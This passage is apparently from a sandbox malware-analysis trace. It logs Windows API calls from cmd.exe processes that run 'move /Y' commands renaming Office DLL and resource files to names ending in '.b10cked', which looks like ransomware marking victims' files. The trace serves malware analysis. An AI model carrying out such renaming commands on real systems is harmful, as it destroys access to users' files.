_String2="ENDLOCAL") returned 8 [0168.761] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0168.761] _wcsicmp (_String1="move", _String2="START") returned -6 [0168.761] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0168.761] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0168.761] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0168.765] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.765] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.765] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f3dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f3d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f3d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0168.766] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0168.766] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0168.766] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0168.766] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0168.766] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0168.766] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.767] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0168.768] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0168.769] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0168.769] _wcsicmp (_String1="GRINTL~2.TRX", _String2=".") returned 57 [0168.769] _wcsicmp (_String1="GRINTL~2.TRX", _String2="..") returned 57 [0168.769] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl~2.trx")) returned 0x2020 [0168.769] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x311f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.770] SetErrorMode (uMode=0x0) returned 0x0 [0168.770] SetErrorMode (uMode=0x1) returned 0x0 [0168.770] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x22ed64, lpFilePart=0x22ed4c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX", lpFilePart=0x22ed4c*="GRINTL~2.TRX") returned 0x3c [0168.770] SetErrorMode (uMode=0x0) returned 0x1 [0168.770] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0168.770] _wcsicmp (_String1="GRINTL~2.TRX", _String2=".") returned 57 [0168.770] _wcsicmp (_String1="GRINTL~2.TRX", _String2="..") returned 57 [0168.770] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl~2.trx")) returned 0x2020 [0168.770] SetErrorMode (uMode=0x0) returned 0x0 [0168.770] SetErrorMode (uMode=0x1) returned 0x0 [0168.771] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x22f1e0, lpFilePart=0x22ef78 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX", lpFilePart=0x22ef78*="GRINTL~2.TRX") returned 0x3c [0168.771] SetErrorMode (uMode=0x0) returned 0x1 [0168.771] SetErrorMode (uMode=0x0) returned 0x0 [0168.771] SetErrorMode (uMode=0x1) returned 0x0 [0168.771] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x22f3e8, lpFilePart=0x22ef78 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked", lpFilePart=0x22ef78*="GRINTL32.REST.trx_dll.b10cked") returned 0x4d [0168.771] SetErrorMode (uMode=0x0) returned 0x1 [0168.771] SetLastError (dwErrCode=0x0) [0168.771] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.rest.trx_dll.b10cked")) returned 0xffffffff [0168.771] GetLastError () returned 0x2 [0168.771] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x22e8f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e8f4) returned 0x312138 [0168.771] FindNextFileW (in: hFindFile=0x312138, lpFindFileData=0x22e8f4 | out: lpFindFileData=0x22e8f4) returned 0 [0168.772] GetLastError () returned 0x12 [0168.772] FindClose (in: hFindFile=0x312138 | out: hFindFile=0x312138) returned 1 [0168.774] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x311cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x311cc8) returned 0x312138 [0168.775] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x22eb8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0168.775] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x22eb8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0168.775] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.rest.trx_dll")) returned 0x2020 [0168.775] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\GRINTL32.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\grintl32.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0168.776] FindClose (in: hFindFile=0x312138 | out: hFindFile=0x312138) returned 1 [0168.776] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x22eb40 | out: _Buffer=" 1") returned 9 [0168.776] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.776] GetFileType (hFile=0x7) returned 0x2 [0168.776] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0168.776] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22eacc | out: lpMode=0x22eacc) returned 1 [0168.776] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.777] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22eb00 | out: lpConsoleScreenBufferInfo=0x22eb00) returned 1 [0168.777] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0168.777] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x22eb40 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0168.777] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22eb24, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22eb24*=0x1a) returned 1 [0168.778] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.778] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.778] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.778] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.778] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.778] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.778] SetConsoleInputExeNameW () returned 0x1 [0168.778] GetConsoleOutputCP () returned 0x1b5 [0168.779] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.779] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.779] exit (_Code=0) Process: id = "286" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xe00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22704 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22705 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22706 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22707 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 22708 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22709 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22710 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22711 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22712 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 22713 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22792 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22793 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22794 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22795 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 22796 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 22797 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22798 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22799 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22800 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22801 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22802 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22803 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22804 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22805 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22806 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 22807 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22808 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22809 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 22810 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 22811 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 22812 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 22813 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 22814 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22815 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Thread: id = 350 os_tid = 0x894 [0168.105] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa34 | out: lpSystemTimeAsFileTime=0x16fa34*(dwLowDateTime=0x9b63e1a0, dwHighDateTime=0x1d440a9)) [0168.105] GetCurrentProcessId () returned 0xe00 [0168.105] GetCurrentThreadId () returned 0x894 [0168.105] GetTickCount () returned 0x31b9a [0168.105] QueryPerformanceCounter (in: lpPerformanceCount=0x16fa2c | out: lpPerformanceCount=0x16fa2c*=22489452853) returned 1 [0168.106] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0168.106] __set_app_type (_Type=0x1) [0168.106] __p__fmode () returned 0x76b331f4 [0168.106] __p__commode () returned 0x76b331fc [0168.106] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0168.106] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0168.107] GetCurrentThreadId () returned 0x894 [0168.107] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x894) returned 0x38 [0168.107] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.107] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0168.107] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.107] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0168.107] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f9c4 | out: phkResult=0x16f9c4*=0x0) returned 0x2 [0168.107] VirtualQuery (in: lpAddress=0x16f9fb, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.107] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0168.107] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0168.107] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.107] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0168.107] GetConsoleOutputCP () returned 0x1b5 [0168.107] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.108] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0168.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.108] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0168.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.108] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.108] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.108] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.108] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.108] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.108] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.108] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0168.109] GetEnvironmentStringsW () returned 0x2b0210* [0168.109] FreeEnvironmentStringsW (penv=0x2b0210) returned 1 [0168.109] GetEnvironmentStringsW () returned 0x2b0210* [0168.109] FreeEnvironmentStringsW (penv=0x2b0210) returned 1 [0168.109] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e934 | out: phkResult=0x16e934*=0x40) returned 0x0 [0168.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0xa0, lpcbData=0x16e938*=0x1000) returned 0x2 [0168.109] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x4) returned 0x0 [0168.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x1000) returned 0x2 [0168.109] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x0, lpcbData=0x16e938*=0x4) returned 0x0 [0168.109] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x4) returned 0x0 [0168.109] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x4) returned 0x0 [0168.109] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x1000) returned 0x2 [0168.110] RegCloseKey (hKey=0x40) returned 0x0 [0168.110] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e934 | out: phkResult=0x16e934*=0x40) returned 0x0 [0168.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x1000) returned 0x2 [0168.110] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x4) returned 0x0 [0168.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x1000) returned 0x2 [0168.110] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x0, lpcbData=0x16e938*=0x4) returned 0x0 [0168.110] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x9, lpcbData=0x16e938*=0x4) returned 0x0 [0168.110] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x9, lpcbData=0x16e938*=0x4) returned 0x0 [0168.110] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x9, lpcbData=0x16e938*=0x1000) returned 0x2 [0168.110] RegCloseKey (hKey=0x40) returned 0x0 [0168.110] time (in: timer=0x0 | out: timer=0x0) returned 